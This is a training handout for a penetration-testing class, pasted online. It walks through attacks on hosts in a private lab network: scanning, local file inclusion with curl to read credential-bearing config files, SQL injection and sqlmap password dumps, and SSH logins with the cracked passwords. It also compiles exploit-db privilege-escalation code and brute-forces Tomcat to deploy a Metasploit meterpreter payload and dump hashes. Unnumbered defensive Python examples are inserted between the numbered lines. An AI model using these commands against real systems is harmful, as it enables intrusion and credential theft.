joemccray

CyberWar AOCO Version 3

Nov 21st, 2017
  1. ########################################################
  2. # CyberWar: Advanced Offensive Cyber Operations #
  3. # By Joe McCray of Strategic Security #
  4. ########################################################
  5.  
  6.  
  7.  
  8. #########################
  9. # Class Virtual Machine #
  10. #########################
  11.  
  12.  
  13. Here is the VMWare virtual machine for the class or you can use Kali Linux as well if you like:
  14.  
  15. https://s3.amazonaws.com/infosecaddictsvirtualmachines/Ubuntu-17-10-InfoSecAddictsVM.zip
  16. user: infosecaddicts
  17. pass: infosecaddicts
  18.  
  19.  
  20. Let's have you connect to the VPN. I wanted to make sure that I did some of the stuff on my local virtual machines because I want you to do the hunting for vulnerable hosts to attack.
  21.  
  22.  
  23. To connect to the VPN open a web browser on your host machine (not your virtual machine) and go to the following URL:
  24. https://54.245.178.32/?src=connect
  25.  
  26.  
  27. Accept the security exception and enter one of the following user names:
  28.  
  29. username: labuser001
  30. username: labuser002
  31. username: labuser003
  32. username: labuser004
  33. username: labuser005
  34. username: labuser006
  35. username: labuser007
  36. username: labuser008
  37. username: labuser009
  38. username: labuser010
  39. username: labuser011
  40. username: labuser012
  41. username: labuser013
  42. username: labuser014
  43. username: labuser015
  44. username: labuser016
  45. username: labuser017
  46. username: labuser018
  47. username: labuser019
  48. username: labuser020
  49.  
  50. ----------------------------------------------------------------------------------------------------------------------------------------
  51.  
  52. Mr. McCray will provide you with the password for the usernames above once the training session starts.
  53.  
  54.  
  55.  
  56.  
  57. The target network range is:
  58. 172.31.2.0/24
  59.  
  60.  
  61. You can do any attack EXCEPT man-in-the-middle attacks, and please DO NOT attack any other IP ranges.
  62.  
  63.  
  64.  
  65.  
  66.  
  67.  
  68.  
  69.  
  70.  
  71.  
  72. ----------------------------------------------------------------------------------------------------------------------------------------
  73. Some tools to install:
  74. ---------------------------Type This-----------------------------------
  75. wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c
  76. gcc propecia.c -o propecia
  77. sudo cp propecia /bin
  78. -----------------------------------------------------------------------
  79.  
  80.  
  81.  
  82.  
  83.  
  84. Step 1: Portscan the server
  85. ---------------------------Type This-----------------------------------
  86. sudo nmap -sS 172.31.2.139
  87. -----------------------------------------------------------------------
  88.  
  89. Step 2: Version scan the server
  90. ---------------------------Type This-----------------------------------
  91. sudo nmap -sV -p22,80 172.31.2.139
  92. -----------------------------------------------------------------------
  93.  
  94.  
  95.  
  96. Step 3: Vulnerability scan the webserver
  97. ---------------------------Type This-----------------------------------
  98. cd ~/toolz/
  99.  
  100. rm -rf nikto*
  101.  
  102. git clone https://github.com/sullo/nikto.git Nikto2
  103.  
  104. cd Nikto2/program
  105.  
  106. perl nikto.pl -h 172.31.2.139
  107. -----------------------------------------------------------------------
  108.  
  109.  
  110.  
  111.  
  112. Step 4: Directory brute-force the webserver
  113. ---------------------------Type This-----------------------------------
  114. cd ~/toolz
  115.  
  116. git clone https://github.com/v0re/dirb.git
  117.  
  118. cd dirb/
  119.  
  120. ./configure
  121.  
  122. make
  123.  
  124. dirb
  125.  
  126. ./dirb http://172.31.2.139 wordlists/big.txt
  127. -----------------------------------------------------------------------
  128.  
  129.  
  130.  
  131.  
  132.  
  133.  
  134.  
  135.  
  136.  
  137.  
  138.  
  139.  
  140.  
  141. ----------------------------------------------------------------------------------------------------------------------------------------------
  142.  
  143.  
  144.  
  145.  
  146.  
  147.  
  148. Attack steps:
  149. -------------
  150.  
  151.  
  152. Step 1: Ping sweep the target network
  153. -------------------------------------
  154.  
  155.  
  156. ---------------------------Type This-----------------------------------
  157. nmap -sP 172.31.2.0/24
  158. -----------------------------------------------------------------------
  159.  
  160. Found 4 hosts:
  161. 172.31.2.47
  162. 172.31.2.47
  163. 172.31.2.157
  164. 172.31.2.217
  165.  
  166.  
  167. Step 2: Port scan target system
  168. -------------------------------
  169.  
  170.  
  171. ---------------------------Type This-----------------------------------
  172. sudo nmap -sV 172.31.2.47
  173. -----------------------------------------------------------------------
  174.  
  175.  
  176.  
  177. PORT STATE SERVICE VERSION
  178. 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
  179. 80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
  180. 514/tcp filtered shell
  181. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  182.  
  183.  
  184.  
  185. Step 3: Vulnerability Scan the webserver
  186. ----------------------------------------
  187.  
  188.  
  189. ---------------------------Type This-----------------------------------
  190. cd ~/toolz/
  191.  
  192. rm -rf nikto*
  193.  
  194. git clone https://github.com/sullo/nikto.git Nikto2
  195.  
  196. cd Nikto2/program
  197.  
  198. perl nikto.pl -h 172.31.2.47
  199. -----------------------------------------------------------------------
  200.  
  201.  
  202. Step 4: Run dirbuster or similar directory bruteforce tool against the target
  203. -----------------------------------------------------------------------------
  204.  
  205.  
  206. ---------------------------Type This-----------------------------------
  207. wget https://dl.packetstormsecurity.net/UNIX/cgi-scanners/Webr00t.pl
  208.  
  209. perl Webr00t.pl -h 172.31.2.47 -v | grep -v "404 Not Found"
  210. -----------------------------------------------------------------------
  211.  
  212.  
  213.  
  214. Step 5: Browse the web site to look for clues
  215. ---------------------------------------------
  216. Since no glaring vulnerabilities were found with the scanner - we start just looking around the website itself
  217.  
  218.  
  219. http://172.31.2.47/test
  220. http://172.31.2.47/test.php (got the following error message)
  221. 'file' parameter is empty. Please provide file path in 'file' parameter
  222.  
  223. Figured this was a Local File Include (LFI) so I tried:
  224. http://172.31.2.47/test.php?file=/etc/passwd
  225. http://172.31.2.47/test.php?file=/etc/passwd%00
  226.  
  227. None of these worked so I tried it as a POST request with curl (reference: https://pastebin.com/yfBz5H7b)
  228. ---------------------------Type This-----------------------------------
  229. curl -X POST -F 'file=/etc/passwd' http://172.31.2.47/test.php
  230. -----------------------------------------------------------------------
  231.  
  232.  
  233.  
  234. http://172.31.2.47/a
  235. http://172.31.2.47/b
  236. http://172.31.2.47/c (a and b gave 404 errors, but "c" is a blank page, and view source is blank as well - this must be a config file"
  237.  
  238. So let's try that POST request with curl to pull down the c.php config file.
  239.  
  240. ---------------------------Type This-----------------------------------
  241. curl -X POST -F 'file=/var/www/html/c.php' http://172.31.2.47/test.php
  242. curl -X POST -F 'file=/var/htdocs/c.php' http://172.31.2.47/test.php
  243. curl -X POST -F 'file=/var/www/c.php' http://172.31.2.47/test.php
  244. -----------------------------------------------------------------------
  245.  
  246. <?php
  247. #header( 'Z-Powered-By:its chutiyapa xD' );
  248. header('X-Frame-Options: SAMEORIGIN');
  249. header( 'Server:testing only' );
  250. header( 'X-Powered-By:testing only' );
  251.  
  252. ini_set( 'session.cookie_httponly', 1 );
  253.  
  254. $conn = mysqli_connect("127.0.0.1","billu","b0x_billu","ica_lab");
  255.  
  256. // Check connection
  257. if (mysqli_connect_errno())
  258. {
  259. echo "connection failed -> " . mysqli_connect_error();
  260. }
  261.  
  262. ?>
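Two things made the test.php walk-through above work: the `file` parameter was passed straight to the include with no check on where the path pointed, and the app only read it from the POST body, so the GET attempts looked like a dead end. The following Python is an added example (not code from the class or from the target application) showing the check a fixed endpoint needs and the request-inspection logic a defender can put in front of one that is not yet fixed. `DOC_ROOT`, the function names and the sample requests are all constructed for this example; the POST body is assumed to be form-urlencoded, so the multipart body that `curl -F` sends would need a multipart parser first.

```python
import os
from urllib.parse import parse_qs

# Constructed for this example: the only directory the page may include from.
DOC_ROOT = "/var/www/html/docs"


def safe_include_path(base_dir, requested):
    """Resolve a user-supplied file name against base_dir.

    Returns the absolute path if it stays inside base_dir, otherwise None.
    It rejects exactly what the walkthrough tried: an absolute path
    (/etc/passwd), a NUL byte (the %00 truncation trick), and a relative
    path that escapes the directory through '..' once normalised.
    """
    if not requested or "\x00" in requested:
        return None
    if os.path.isabs(requested):
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    # Compare with a trailing separator so /var/www/html/docs2 is not accepted.
    if candidate != base and not candidate.startswith(base + os.sep):
        return None
    return candidate


def extract_file_param(method, query, body=""):
    """Pull 'file' from the query string and, for POST, from the body too.

    Reading both is the point: the page ignored ?file= in the URL and only
    honoured the POST field, so an inspection that looks at the query string
    alone misses the request that actually worked.
    """
    params = parse_qs(query, keep_blank_values=True)
    if method.upper() == "POST":
        params.update(parse_qs(body, keep_blank_values=True))
    values = params.get("file", [])
    return values[0] if values else None


def flag_request(method, query, body=""):
    """Reasons (possibly none) why a request's 'file' value looks like LFI."""
    value = extract_file_param(method, query, body)
    if value is None:
        return []
    reasons = []
    if "\x00" in value:
        reasons.append("nul-byte")
    if os.path.isabs(value):
        reasons.append("absolute-path")
    if ".." in value.split("/"):
        reasons.append("traversal")
    if not reasons and safe_include_path(DOC_ROOT, value) is None:
        reasons.append("outside-docroot")
    return reasons


if __name__ == "__main__":
    # Constructed requests mirroring the ones tried above.
    samples = [
        ("GET", "file=/etc/passwd", ""),
        ("GET", "file=/etc/passwd%00", ""),
        ("POST", "", "file=/var/www/c.php"),
        ("GET", "file=manual.txt", ""),
    ]
    for method, query, body in samples:
        print(method, query or body, "->", flag_request(method, query, body) or "ok")
```

The realpath comparison, not string filtering, is what makes `safe_include_path` hold up: `..` segments and symlinks are resolved before the prefix check, so the only way to pass is to end up inside `DOC_ROOT`. The second lesson from the c.php and config.inc.php pulls above is that any readable file in or near the web root is in scope once this check is missing, so database credentials belong outside it.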
  263.  
  264.  
  265.  
  266. ---------------------------Type This-----------------------------------
  267. ssh -l billu 172.31.2.47
  268. b0x_billu
  269. -----------------------------------------------------------------------
  270.  
  271.  
  272.  
  273. http://172.31.2.47/phpmyadmin
  274. http://172.31.2.47/phpMyAdmin
  275. http://172.31.2.47/pma
  276. http://172.31.2.47/phpmy
  277.  
  278.  
  279. Then I Googled config file name for phpmyadmin (config.inc.php)
  280.  
  281. ---------------------------Type This-----------------------------------
  282. curl -X POST -F 'file=/var/www/phpmy/config.inc.php' http://172.31.2.47/test.php
  283. -----------------------------------------------------------------------
  284. <?php
  285.  
  286. /* Servers configuration */
  287. $i = 0;
  288.  
  289. /* Server: localhost [1] */
  290. $i++;
  291. $cfg['Servers'][$i]['verbose'] = 'localhost';
  292. $cfg['Servers'][$i]['host'] = 'localhost';
  293. $cfg['Servers'][$i]['port'] = '';
  294. $cfg['Servers'][$i]['socket'] = '';
  295. $cfg['Servers'][$i]['connect_type'] = 'tcp';
  296. $cfg['Servers'][$i]['extension'] = 'mysqli';
  297. $cfg['Servers'][$i]['auth_type'] = 'cookie';
  298. $cfg['Servers'][$i]['user'] = 'root';
  299. $cfg['Servers'][$i]['password'] = 'roottoor';
  300. $cfg['Servers'][$i]['AllowNoPassword'] = true;
  301.  
  302.  
  303. ---------------------------Type This-----------------------------------
  304. ssh -l root 172.31.2.47
  305. roottoor
  306. -----------------------------------------------------------------------
  307.  
  308.  
  309.  
  310.  
  311.  
  312.  
  313. ---------------------------------------------------------------------------------------------------------------------------------------------------------
  314.  
  315. Attack steps:
  316. -------------
  317.  
  318.  
  319.  
  320. Step 1: Ping sweep the target network
  321. -------------------------------------
  322.  
  323.  
  324. ---------------------------Type This-----------------------------------
  325. nmap -sP 172.31.2.0/24
  326. -----------------------------------------------------------------------
  327.  
  328.  
  329.  
  330. - Found 3 hosts
  331. 172.31.2.64
  332. 172.31.2.217
  333. 172.31.2.238
  334.  
  335.  
  336.  
  337. Step 2: Port scan target system
  338. -------------------------------
  339.  
  340.  
  341. ---------------------------Type This-----------------------------------
  342. nmap -sV 172.31.2.64
  343. -----------------------------------------------------------------------
  344.  
  345.  
  346.  
  347. -------------Scan Results--------------------------------------------
  348. PORT STATE SERVICE VERSION
  349. 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
  350. 80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
  351. 514/tcp filtered shell
  352. 1037/tcp filtered ams
  353. 6667/tcp open irc ngircd
  354. Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
  355. --------------------------------------------------------------------
  356.  
  357.  
  358. Step 3: Vulnerability Scan the webserver
  359. ----------------------------------------
  360.  
  361.  
  362. ---------------------------Type This-----------------------------------
  363. cd ~/toolz/
  364.  
  365. rm -rf nikto*
  366.  
  367. git clone https://github.com/sullo/nikto.git Nikto2
  368.  
  369. cd Nikto2/program
  370.  
  371. perl nikto.pl -h 172.31.2.64
  372. -----------------------------------------------------------------------
  373.  
  374.  
  375. Step 4: Run dirbuster or similar directory bruteforce tool against the target
  376. -----------------------------------------------------------------------------
  377.  
  378.  
  379. ---------------------------Type This-----------------------------------
  380. wget https://dl.packetstormsecurity.net/UNIX/cgi-scanners/Webr00t.pl
  381.  
  382. perl Webr00t.pl -h 172.31.2.64 -v
  383. -----------------------------------------------------------------------
  384.  
  385.  
  386.  
  387. Step 5: Browse the web site to look for clues
  388. ---------------------------------------------
  389. Since no glaring vulnerabilities were found with the scanner - we start just looking around the website itself
  390.  
  391.  
  392. ..... really didn't get much from here so we just opened the web page in a browser
  393. http://172.31.2.64/
  394.  
  395. .....browsed to the webpage and saw that it pointed to:
  396. http://172.31.2.64/jabc
  397.  
  398. ....clicked on documentation link and found hidden text that pointed to here:
  399. http://172.31.2.64/jabcd0cs/
  400.  
  401. ....saw that the app was OpenDocMan v1.2.7 and found it was vulnerable:
  402. https://www.exploit-db.com/exploits/32075/
  403.  
  404. Tried the sql injection described in exploit-db:
  405. http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,version(),3,4,5,6,7,8,9
  406.  
  407. http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,user(),3,4,5,6,7,8,9
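The injection above lands in `add_value`, which the application splices into the query as a table name. That matters for the fix: a bound parameter can only ever carry a value, so prepared statements alone cannot protect an identifier, and the correct control is an allowlist of the table names the endpoint is meant to read. The Python below is an added example (not OpenDocMan's code) that reproduces the assumed shape of the flawed query against an in-memory SQLite database with constructed rows, and sets the hardened version beside it. The table layout, `ALLOWED_TABLES` and the three-column payload are constructed for this example; SQLite's `sqlite_version()` stands in for MySQL's `version()`.

```python
import sqlite3

# Tables the endpoint is genuinely allowed to read from (constructed allowlist).
ALLOWED_TABLES = {"odm_user", "odm_department"}


def setup_db():
    """In-memory stand-in for the application database, with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE odm_user (id INTEGER, username TEXT, password TEXT)")
    conn.execute("CREATE TABLE odm_department (id INTEGER, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO odm_user VALUES (?, ?, ?)",
        [(1, "webmin", "<constructed-hash-1>"), (2, "alice", "<constructed-hash-2>")],
    )
    return conn


def lookup_vulnerable(conn, q, add_value):
    """Assumed shape of the flawed query: both parameters spliced into the SQL text."""
    sql = f"SELECT id, username, password FROM {add_value} WHERE id = {q}"
    return conn.execute(sql).fetchall()


def lookup_hardened(conn, q, add_value):
    """Identifier checked against an allowlist; the value bound as a parameter.

    The allowlist is the only correct control for add_value. q is coerced to
    int and bound with '?', which also rejects 'OR 1=1' style payloads.
    """
    if add_value not in ALLOWED_TABLES:
        raise ValueError(f"table not permitted: {add_value!r}")
    sql = f"SELECT id, username, password FROM {add_value} WHERE id = ?"
    return conn.execute(sql, (int(q),)).fetchall()


def is_rejected(q, add_value):
    """True if the hardened lookup refuses the inputs (allowlist or type check)."""
    try:
        lookup_hardened(setup_db(), q, add_value)
    except ValueError:
        return True
    return False


# Same UNION pattern as the request above, trimmed to this table's three
# columns; '--' comments out the WHERE clause the application appends.
INJECTED_TABLE = "odm_user WHERE id = 1 UNION SELECT 1, sqlite_version(), 3 --"


def demo():
    """Returns (version leaked by the flawed query?, blocked by the fix?, normal result)."""
    conn = setup_db()
    leaked = lookup_vulnerable(conn, "1", INJECTED_TABLE)
    version_leaked = any(row[1] == sqlite3.sqlite_version for row in leaked)
    blocked = is_rejected("1", INJECTED_TABLE)
    normal = lookup_hardened(conn, "1", "odm_user")
    return version_leaked, blocked, normal


if __name__ == "__main__":
    print(demo())
```

The same reasoning applies to sqlmap's `-D`/`-T` enumeration that follows: every table the database user can read is reachable through an unchecked identifier, so the database account behind the web app should also be limited to the tables it needs.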
  408.  
  409.  
  410.  
  411. Tried to run sqlmap against the target
  412.  
  413.  
  414. ---------------------------Type This-----------------------------------
  415. cd sqlmap-dev/
  416. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -b --dbms=mysql
  417.  
  418. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-user --dbms=mysql
  419.  
  420. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-db --dbms=mysql
  421.  
  422. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --dbs --dbms=mysql
  423.  
  424. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --users --passwords --dbms=mysql
  425. -----------------------------------------------------------------------
  426.  
  427.  
  428.  
  429. FOUND: cracked password 'toor' for user 'drupal7' (sqlmap)
  430. FOUND: 9CFBBC772F3F6C106020035386DA5BBBF1249A11 hash is 'toor' verified at crackstation.net
  431.  
  432.  
  433.  
  434. ---------------------------Type This-----------------------------------
  435. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs --tables --dbms=mysql
  436.  
  437. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs -T odm_user --dump --dbms=mysql
  438. -----------------------------------------------------------------------
  439.  
  440. username: webmin
  441. hash: b78aae356709f8c31118ea613980954b
  442.  
  443. https://hashkiller.co.uk/md5-decrypter.aspx
  444.  
  445. hash: b78aae356709f8c31118ea613980954b
  446. pass: webmin1980
  447.  
  448.  
  449. ok - /phpmyadmin and /webmin both did not work in the browser but these credentials worked for SSH.
  450.  
  451.  
  452.  
  453. ---------------------------Type This-----------------------------------
  454. ssh -l webmin 172.31.2.64
  455. webmin1980
  456.  
  457. id
  458.  
  459. cat /etc/*release
  460. -----------------------------------------------------------------------
  461.  
  462.  
  463.  
  464. ....tired of not having a real command shell...
  465.  
  466.  
  467. ---------------------------Type This-----------------------------------
  468. python -c 'import pty;pty.spawn("/bin/bash")'
  469.  
  470.  
  471. cd /tmp
  472.  
  473. pwd
  474.  
  475.  
  476. cat >> exploit.c << out
  477.  
  478. **************paste in the content from here *****************
  479. https://www.exploit-db.com/raw/39166/
  480.  
  481.  
  482. ------ hit enter a few times ------
  483.  
  484. ------ then type 'out' ----- this closes the file handle...
  485.  
  486.  
  487.  
  488. ---------------------------Type This-----------------------------------
  489. gcc -o boom exploit.c
  490.  
  491. ./boom
  492. -----------------------------------------------------------------------
  493.  
  494.  
  495. ------------exploit failed, damn let's try another one ---------
  496.  
  497.  
  498.  
  499. ---------------------------Type This-----------------------------------
  500. cat >> exploit2.c << out
  501.  
  502. **************paste in the content from here *****************
  503. https://www.exploit-db.com/raw/37292/
  504.  
  505.  
  506. out
  507.  
  508.  
  509. gcc -o boom2 exploit2.c
  510.  
  511. ./boom2
  512.  
  513. id
  514.  
  515.  
  516. ......YEAH - do the happy dance!!!!
  517.  
  518.  
  519.  
  520.  
  521. ---- Previous class attack process -------
  522.  
  523.  
  524. #########################
  525. # Building a quick list #
  526. #########################
  527.  
  528. ---------------------------Type This-----------------------------------
  529.  
  530. cd ~
  531. echo bob >> list.txt
  532. echo jim >> list.txt
  533. echo joe >> list.txt
  534. echo tim >> list.txt
  535. echo admin >> list.txt
  536. echo hello >> list.txt
  537. echo rob >> list.txt
  538. echo test >> list.txt
  539. echo aaaaaa >> list.txt
  540. echo larry >> list.txt
  541. echo mario >> list.txt
  542. echo jason >> list.txt
  543. echo john >> list.txt
  544. -----------------------------------------------------------------------
  545.  
  546.  
  547. ###########################################################
  548. # Let's start with some basic scanning of the lab network #
  549. ###########################################################
  550.  
  551. ---------------------------Type This-----------------------------------
  552.  
  553. infosecaddicts@ubuntu:~$ nmap -sP 172.31.2.0/24
  554. -----------------------------------------------------------------------
  555.  
  556. Starting Nmap 7.12 ( https://nmap.org ) at 2017-11-21 13:17 EST
  557. Nmap scan report for 172.31.2.24
  558. Host is up (0.046s latency).
  559. Nmap scan report for 172.31.2.47
  560. Host is up (0.045s latency).
  561. Nmap scan report for 172.31.2.64
  562. Host is up (0.037s latency).
  563. Nmap scan report for 172.31.2.86
  564. Host is up (0.040s latency).
  565. Nmap scan report for 172.31.2.117
  566. Host is up (0.038s latency).
  567. Nmap scan report for 172.31.2.139
  568. Host is up (0.037s latency).
  569. Nmap scan report for 172.31.2.157
  570. Host is up (0.036s latency).
  571. Nmap scan report for 172.31.2.217
  572. Host is up (0.047s latency).
  573. Nmap scan report for 172.31.2.238
  574. Host is up (0.036s latency).
  575. Nmap done: 256 IP addresses (9 hosts up) scanned in 3.22 seconds
  576.  
  577.  
  578.  
  579.  
  580.  
  581.  
  582. ---------------------------Type This-----------------------------------
  583.  
  584. infosecaddicts@ubuntu:~$ sudo nmap -sS 172.31.2.24
  585. -----------------------------------------------------------------------
  586.  
  587. [sudo] password for infosecaddicts:
  588.  
  589. Starting Nmap 7.12 ( https://nmap.org ) at 2017-11-21 13:18 EST
  590. Nmap scan report for 172.31.2.24
  591. Host is up (1.8s latency).
  592. Not shown: 989 closed ports
  593. PORT STATE SERVICE
  594. 25/tcp open smtp
  595. 80/tcp open http
  596. 111/tcp open rpcbind
  597. 139/tcp open netbios-ssn
  598. 445/tcp open microsoft-ds
  599. 514/tcp filtered shell
  600. 1322/tcp open novation
  601. 2049/tcp open nfs
  602. 8080/tcp open http-proxy
  603. 8081/tcp open blackice-icecap
  604. 9000/tcp open cslistener
  605.  
  606. Nmap done: 1 IP address (1 host up) scanned in 133.56 seconds
  607.  
  608.  
  609.  
  610.  
  611.  
  612.  
  613.  
  614. ---------------------------Type This-----------------------------------
  615.  
  616. infosecaddicts@ubuntu:~$ sudo nmap -sV -p25,80,111,139,445,1322,2049,8080,8081,9000 172.31.2.24
  617. -----------------------------------------------------------------------
  618.  
  619. Starting Nmap 7.12 ( https://nmap.org ) at 2017-11-21 13:21 EST
  620. Nmap scan report for 172.31.2.24
  621. Host is up (0.031s latency).
  622. PORT STATE SERVICE VERSION
  623. 25/tcp open ftp vsftpd 3.0.2
  624. 80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
  625. 111/tcp open rpcbind 2-4 (RPC #100000)
  626. 139/tcp open netbios-ssn Samba smbd 3.X (workgroup: CANYOUPWNME)
  627. 445/tcp open netbios-ssn Samba smbd 3.X (workgroup: CANYOUPWNME)
  628. 1322/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
  629. 2049/tcp open nfs_acl 2-3 (RPC #100227)
  630. 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
  631. 8081/tcp open http Apache httpd 2.4.7 ((Ubuntu))
  632. 9000/tcp open http Jetty winstone-2.9
  633. Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
  634.  
  635. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  636. Nmap done: 1 IP address (1 host up) scanned in 15.15 seconds
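Compare the two scans above: `-sS` reported 25/tcp as smtp and 1322/tcp as novation, while `-sV` found vsftpd and OpenSSH there. A SYN scan never talks to the service, so its SERVICE column is just nmap's port-number table; only the version probe reads a banner. The Python below is an added example (not part of the class material) that parses both outputs as printed above and reports every port where the two disagree, which is what a defender's asset inventory should be built from. The parser and function names are constructed for this example; the scan text is the output shown above.

```python
import re

# Scan output for 172.31.2.24 as shown above (SYN scan, then version scan).
SYN_SCAN = """
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
514/tcp filtered shell
1322/tcp open novation
2049/tcp open nfs
8080/tcp open http-proxy
8081/tcp open blackice-icecap
9000/tcp open cslistener
"""

VERSION_SCAN = """
PORT STATE SERVICE VERSION
25/tcp open ftp vsftpd 3.0.2
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
111/tcp open rpcbind 2-4 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: CANYOUPWNME)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: CANYOUPWNME)
1322/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
2049/tcp open nfs_acl 2-3 (RPC #100227)
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
8081/tcp open http Apache httpd 2.4.7 ((Ubuntu))
9000/tcp open http Jetty winstone-2.9
"""

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


def parse_nmap_ports(text):
    """Parse 'PORT STATE SERVICE [VERSION]' lines from nmap's normal output.

    Returns {(port, proto): {"state", "service", "version"}}. The header and
    'Service Info' lines do not match the pattern and are skipped.
    """
    ports = {}
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:
            continue
        port, proto, state, service, version = m.groups()
        ports[(int(port), proto)] = {
            "state": state,
            "service": service,
            "version": (version or "").strip(),
        }
    return ports


def service_mismatches(syn_ports, version_ports):
    """Ports where the -sS table lookup and the -sV banner disagree.

    Each finding is (port, name from the port table, probed service, version).
    A disagreement means something is listening on a port that does not
    belong to it, e.g. FTP on 25 and SSH on 1322 in the scans above.
    """
    findings = []
    for key, syn in syn_ports.items():
        probed = version_ports.get(key)
        if probed and probed["service"] != syn["service"]:
            findings.append((key[0], syn["service"], probed["service"], probed["version"]))
    return sorted(findings)


def unprobed_ports(syn_ports, version_ports):
    """Ports the SYN scan saw that the follow-up -sV run did not cover."""
    return sorted(port for (port, proto) in syn_ports if (port, proto) not in version_ports)


if __name__ == "__main__":
    syn = parse_nmap_ports(SYN_SCAN)
    ver = parse_nmap_ports(VERSION_SCAN)
    for port, guessed, probed, version in service_mismatches(syn, ver):
        print(f"{port}/tcp: table says {guessed}, banner says {probed} ({version})")
    print("not version-scanned:", unprobed_ports(syn, ver))
```

The `unprobed_ports` check catches the gap that the `-p` list above created: 514/tcp was filtered in the SYN scan and then dropped from the version scan, so it never got a banner at all. Running the version scan against the full open/filtered set is the cheaper habit.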
  637.  
  638.  
  639.  
  640.  
  641.  
  642.  
  643.  
  644.  
  645. ###########################
  646. # Day 1: Attacking Kevgir #
  647. ###########################
  648.  
  649.  
  650. ******** Attacking Kevgir ********
  651. I figured I've give you something fun to play with.
  652.  
  653.  
  654.  
  655. ###############
  656. # Using Nikto #
  657. ###############
  658.  
  659. ---------------------------Type This-----------------------------------
  660.  
  661. cd ~/toolz/
  662.  
  663. rm -rf nikto*
  664.  
  665. git clone https://github.com/sullo/nikto.git Nikto2
  666.  
  667. cd Nikto2/program
  668.  
  669. perl nikto.pl -h 172.31.2.24
  670.  
  671. perl nikto.pl -h 172.31.2.24:8080
  672.  
  673. perl nikto.pl -h 172.31.2.24:8081
  674.  
  675. perl nikto.pl -h 172.31.2.24:9000
  676.  
  677. -----------------------------------------------------------------------
  678.  
  679.  
  680.  
  681. ####################
  682. # Using Metasploit #
  683. ####################
  684.  
  685. ---------------------------Type This-----------------------------------
  686.  
  687. cd ~/toolz/metasploit
  688.  
  689. ./msfconsole
  690.  
  691. use auxiliary/scanner/http/http_version
  692.  
  693. set RHOSTS 172.31.2.24
  694.  
  695. set RPORT 8080
  696.  
  697. run
  698.  
  699.  
  700. -------------------------------
  701.  
  702. use auxiliary/scanner/http/tomcat_enum
  703.  
  704. set RHOSTS 172.31.2.24
  705.  
  706. set RPORT 8080
  707.  
  708. run
  709. -----------------------------------------------------------------------
  710.  
  711.  
  712.  
  713.  
  714.  
  715. ####################
  716. # Attacking Tomcat #
  717. ####################
  718.  
  719. ---------------------------Type This-----------------------------------
  720.  
  721. use auxiliary/scanner/http/http_version
  722.  
  723. set RHOSTS 172.31.2.24
  724.  
  725. set RPORT 8080
  726.  
  727. run
  728.  
  729.  
  730. -------------------------------
  731.  
  732.  
  733. use auxiliary/scanner/http/tomcat_mgr_login
  734.  
  735. set USERNAME tomcat
  736.  
  737. set USERPASS_FILE /home/infosecaddicts/list.txt
  738.  
  739. set STOP_ON_SUCCESS true
  740.  
  741. set RHOSTS 172.31.2.24
  742.  
  743. set RPORT 8080
  744.  
  745. run
  746.  
  747.  
  748. -------------------------------
  749.  
  750. use exploit/multi/http/tomcat_mgr_upload
  751.  
  752. set HttpUsername tomcat
  753.  
  754. set HttpPassword tomcat
  755.  
  756. set RHOST 172.31.2.24
  757.  
  758. set RPORT 8080
  759.  
  760. set PATH /manager/html
  761.  
  762. set PAYLOAD java/meterpreter/bind_tcp
  763.  
  764. exploit
  765.  
  766.  
  767. run post/linux/gather/checkvm
  768.  
  769. run post/linux/gather/enum_configs
  770.  
  771. run post/linux/gather/enum_protections
  772.  
  773. run post/linux/gather/enum_system
  774.  
  775. run post/linux/gather/enum_users_history
  776.  
  777. run post/linux/gather/hashdump
  778.  
  779. shell
  780.  
  781. /bin/bash
  782.  
  783. id
  784.  
  785. uname -a
  786.  
  787. dpkg -l
  788.  
  789. cd /tmp
  790.  
  791. pwd
  792.  
  793.  
  794. cat >> exploit.c << out
  795.  
  796. **************paste in the content from here *****************
  797. https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/39166.c
  798.  
  799.  
  800. ------ hit enter a few times ------
  801.  
